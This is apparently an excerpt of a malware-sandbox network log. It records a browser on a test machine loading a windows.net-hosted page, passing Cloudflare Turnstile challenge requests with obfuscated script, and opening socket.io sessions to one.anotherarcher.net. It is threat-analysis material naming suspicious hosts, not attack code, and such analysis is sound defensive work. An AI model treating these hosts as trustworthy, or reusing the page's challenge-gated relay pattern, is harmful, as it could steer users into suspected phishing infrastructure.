                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:22 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 75 70 42 4c 58 2d 49 48 35 65 36 32 6e 65 46 31 41 41 4e 58 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"upBLX-IH5e62neF1AANX","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                80192.168.2.449841104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd805a9cd425d&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:22 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 125635
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd81de873c32b-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a
                                                                                                                                                                                                                                Data Ascii: 0the%20Site%20Administrator%20if%20this%20problem%20persists.","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","invalid_sitekey":
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 73 65 49 6e 74 28 67 48 28 31 35 38 33 29 29 2f 31 31 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 31 32 35 31 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 34 31 32 29 5d 2c 65 4d 5b 67 49 28 31 38 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 67 4a 3d 67 49 2c 64 3d 7b 7d 2c 64 5b 67 4a 28 31 30 34 33 29 5d 3d 67 4a 28 31 38 38 39 29 2c 64 5b 67 4a 28 37 35 30 29 5d 3d 67 4a 28 31 31 35 33 29 2c 64 5b 67 4a 28 39 35 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 64 5b 67 4a 28 31 33 36
                                                                                                                                                                                                                                Data Ascii: seInt(gH(1583))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,612512),eM=this||self,eN=eM[gI(1412)],eM[gI(1809)]=function(gJ,d,e,f,g){gJ=gI,d={},d[gJ(1043)]=gJ(1889),d[gJ(750)]=gJ(1153),d[gJ(959)]=function(h,i){return i*h},d[gJ(136
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 33 29 5d 2c 78 5b 67 4c 28 35 35 36 29 5d 28 42 2c 6e 2c 21 21 5b 5d 29 2c 78 5b 67 4c 28 31 30 38 30 29 5d 3d 32 35 30 30 2c 78 5b 67 4c 28 38 34 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 78 5b 67 4c 28 31 32 34 33 29 5d 28 6b 5b 67 4c 28 31 31 38 36 29 5d 2c 6b 5b 67 4c 28 31 35 31 37 29 5d 29 2c 43 3d 7b 7d 2c 43 5b 67 4c 28 31 36 39 36 29 5d 3d 67 2c 43 2e 63 63 3d 68 2c 43 5b 67 4c 28 31 38 37 34 29 5d 3d 6c 2c 43 5b 67 4c 28 39 39 36 29 5d 3d 73 2c 44 3d 4a 53 4f 4e 5b 67 4c 28 31 38 37 37 29 5d 28 43 29 2c 45 3d 67 79 5b 67 4c 28 31 35 34 34 29 5d 28 44 29 5b 67 4c 28 37 39 32 29 5d 28 27 2b 27 2c 67 4c 28 38 31 39 29 29 2c 78 5b 67 4c 28 37 33 30 29 5d 28 6b 5b 67 4c 28 36 31 36 29 5d 28 27 76 5f 27 2b 65 4d 5b 67 4c 28 31 33 33 30 29 5d
                                                                                                                                                                                                                                Data Ascii: 3)],x[gL(556)](B,n,!![]),x[gL(1080)]=2500,x[gL(847)]=function(){},x[gL(1243)](k[gL(1186)],k[gL(1517)]),C={},C[gL(1696)]=g,C.cc=h,C[gL(1874)]=l,C[gL(996)]=s,D=JSON[gL(1877)](C),E=gy[gL(1544)](D)[gL(792)]('+',gL(819)),x[gL(730)](k[gL(616)]('v_'+eM[gL(1330)]
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 67 4e 2c 6f 2c 73 2c 76 29 7b 69 66 28 67 4e 3d 67 4d 2c 67 4e 28 31 35 32 35 29 21 3d 3d 67 4e 28 31 35 32 35 29 29 7b 69 66 28 78 3d 42 2e 68 5b 32 5e 43 2e 67 5d 2c 6a 5b 67 4e 28 31 37 37 36 29 5d 28 30 2c 44 5b 67 4e 28 31 31 34 31 29 5d 29 29 7b 66 6f 72 28 6f 3d 6a 5b 67 4e 28 39 37 33 29 5d 5b 67 4e 28 31 34 35 35 29 5d 28 27 7c 27 29 2c 73 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6f 5b 73 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 55 2e 68 5b 56 2e 67 5e 31 36 5d 3d 57 5b 67 4e 28 31 31 38 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 50 2e 68 5b 6a 5b 67 4e 28 38 36 37 29 5d 28 35 38 2c 51 2e 67 29 5d 3d 52 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 58 2e 68 5b 6a 5b 67 4e 28 38 36 37
                                                                                                                                                                                                                                Data Ascii: nction(gN,o,s,v){if(gN=gM,gN(1525)!==gN(1525)){if(x=B.h[2^C.g],j[gN(1776)](0,D[gN(1141)])){for(o=j[gN(973)][gN(1455)]('|'),s=0;!![];){switch(o[s++]){case'0':U.h[V.g^16]=W[gN(1184)]();continue;case'1':P.h[j[gN(867)](58,Q.g)]=R;continue;case'2':X.h[j[gN(867
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 6a 5b 67 50 28 31 37 35 37 29 5d 28 31 36 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 50 28 39 30 34 29 5d 28 74 68 69 73 2e 68 5b 6a 5b 67 50 28 31 38 39 36 29 5d 28 31 36 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 31 30 29 2c 32 35 36 29 26 32 35 35 5e 34 39 2c 74 68 69 73 2e 68 5b 6a 5b 67 50 28 31 32 35 30 29 5d 28 6f 2c 74 68 69 73 2e 67 29 5d 3d 76 5b 73 5d 2e 6c 3b 65 6c 73 65 20 69 66 28 6a 5b 67 50 28 31 36 34 38 29 5d 28 31 30 38 2c 6f 29 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 73 3b 78 3d 67 28 74 68 69 73 29 2c 42 3d 7b 7d 2c 42 2e 6c 3d 76 6f 69 64 20 30 2c 76 5b 78 5d 3d 42 2c 6f 2b 2b 29 3b 7d 7d 65 6c 73 65 20 65 4d 5b 67 50 28 31 38 30 39 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 4d 28 31 39 33 39 29 5d 5b 67 4d 28 31 35 34 35 29 5d 28
                                                                                                                                                                                                                                Data Ascii: j[gP(1757)](16,this.g)][1][gP(904)](this.h[j[gP(1896)](16,this.g)][0]++),10),256)&255^49,this.h[j[gP(1250)](o,this.g)]=v[s].l;else if(j[gP(1648)](108,o)){for(o=0;o<s;x=g(this),B={},B.l=void 0,v[x]=B,o++);}}else eM[gP(1809)]()},1e3),eM[gM(1939)][gM(1545)](
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 31 2c 68 3d 74 68 69 73 2e 68 5b 64 5b 68 46 28 36 33 39 29 5d 28 31 36 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 64 5b 68 46 28 31 30 35 35 29 5d 28 64 5b 68 46 28 31 34 33 30 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 46 28 36 33 39 29 5d 28 31 36 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 46 28 39 30 34 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 46 28 36 33 39 29 5d 28 31 36 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 31 30 2c 32 35 36 29 2c 32 35 35 29 2c 64 5b 68 46 28 31 30 39 33 29 5d 28 37 2c 68 29 3f 28 69 3d 64 5b 68 46 28 34 32 34 29 5d 28 67 2c 39 30 29 2c 6a 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 28 68 5e 31 39 31 29 5d 29 3a 31 37 30 3d 3d 3d 69 3f 28 69 3d 64 5b 68 46 28 34 32 34 29 5d 28 67 2c 31 38 39 29 2c 6a 3d 2d 74
                                                                                                                                                                                                                                Data Ascii: 1,h=this.h[d[hF(639)](16,this.g)][3]^d[hF(1055)](d[hF(1430)](this.h[d[hF(639)](16,this.g)][1][hF(904)](this.h[d[hF(639)](16,this.g)][0]++)-10,256),255),d[hF(1093)](7,h)?(i=d[hF(424)](g,90),j=typeof this.h[this.g^(h^191)]):170===i?(i=d[hF(424)](g,189),j=-t
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 6e 20 67 28 68 29 7d 2c 27 49 42 72 55 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 6a 39 28 31 38 35 37 29 5d 28 67 6e 2c 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 65 5b 6a 39 28 31 38 35 37 29 5d 28 67 6c 2c 65 5b 6a 39 28 34 35 36 29 5d 28 67 6d 2c 63 29 29 7d 7d 2c 65 4d 5b 67 49 28 34 37 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 31 33 38 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6a 70 29 7b 69 66 28 6a 70 3d 67 49 2c 65 4d 5b 6a 70 28 34 37 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 6a 70 28 34 37 33 29 5d 3d 21 21 5b 5d 7d 2c 67 75 3d 30 2c 65 4e 5b 67 49 28 31 36 39 37 29 5d 3d 3d 3d 67 49 28 31 39 35 33 29 3f 65 4e 5b 67 49 28 31 30 34 36 29 5d 28
                                                                                                                                                                                                                                Data Ascii: n g(h)},'IBrUL':function(g,h){return g(h)}});try{return e[j9(1857)](gn,c)}catch(g){return e[j9(1857)](gl,e[j9(456)](gm,c))}},eM[gI(473)]=![],eM[gI(1384)]=function(jp){if(jp=gI,eM[jp(473)])return;eM[jp(473)]=!![]},gu=0,eN[gI(1697)]===gI(1953)?eN[gI(1046)](
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 6a 44 29 7b 72 65 74 75 72 6e 20 6a 44 3d 6a 43 2c 6a 5b 6a 44 28 31 32 39 32 29 5d 5b 6a 44 28 36 36 39 29 5d 28 6b 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 6a 45 2c 78 2c 42 2c 54 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 55 2c 56 2c 4e 2c 4f 2c 50 2c 51 2c 52 29 7b 69 66 28 6a 45 3d 6a 42 2c 78 3d 7b 7d 2c 78 5b 6a 45 28 31 37 30 39 29 5d 3d 6a 45 28 31 32 36 37 29 2c 42 3d 78 2c 64 5b 6a 45 28 31 36 30 39 29 5d 28 64 5b 6a 45 28 31 37 35 36 29 5d 2c 6a 45 28 31 33 32 38 29 29 29 54 3d 4a 5b 6a 45 28 38 39 32 29 5d 28 6f 5b 6a 45 28 31 31 31 33 29 5d 29 2c 54 5b 6a 45 28 36 39 33 29 5d 26 26 28 78 3d 54 5b 6a 45 28
                                                                                                                                                                                                                                Data Ascii: l==h?'':f.g(h,6,function(k,jD){return jD=jC,j[jD(1292)][jD(669)](k)})},'g':function(j,o,s,jE,x,B,T,C,D,E,F,G,H,I,J,K,L,M,U,V,N,O,P,Q,R){if(jE=jB,x={},x[jE(1709)]=jE(1267),B=x,d[jE(1609)](d[jE(1756)],jE(1328)))T=J[jE(892)](o[jE(1113)]),T[jE(693)]&&(x=T[jE(
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC1369INData Raw: 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 47 3d 3d 30 26 26 28 47 3d 4d 61 74 68 5b 6a 45 28 31 37 33 31 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 52 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 6a 45 28 31 33 35 39 29 5d 28 4b 2c 31 29 7c 64 5b 6a 45 28 37 33 38 29 5d 28 52 2c 31 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 6a 45 28 31 31 34 32 29 5d 28 64 5b 6a 45 28 31 31 31 32 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 44 5b 4f 5d 3d 48 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 46 3d 53 74 72 69 6e 67 28 4e 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                                                                                                                                                                                                Data Ascii: =0):L++,R>>=1,C++);}G--,G==0&&(G=Math[jE(1731)](2,I),I++),delete E[F]}else for(R=D[F],C=0;C<I;K=d[jE(1359)](K,1)|d[jE(738)](R,1),o-1==L?(L=0,J[jE(1142)](d[jE(1112)](s,K)),K=0):L++,R>>=1,C++);continue;case'1':D[O]=H++;continue;case'2':F=String(N);continue;


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                81192.168.2.449840104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:22 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-out: RGdxWmfhj4s2U7mfkw1RE4NwgT2KXuENeWE=$zUPOz9i5kx6lt4Nx
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd81de97a42b2-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:22 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                82192.168.2.44984379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: UiFaPdmwgSx0alLQ4od71Q==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:23 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                83192.168.2.44984279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB4i0&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:23 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                84192.168.2.44984479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB4i2&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:24 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 58 6f 76 50 47 54 79 4a 74 2d 42 35 31 67 6b 48 41 41 4e 59 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"XovPGTyJt-B51gkHAANY"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                85192.168.2.449845104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC823OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
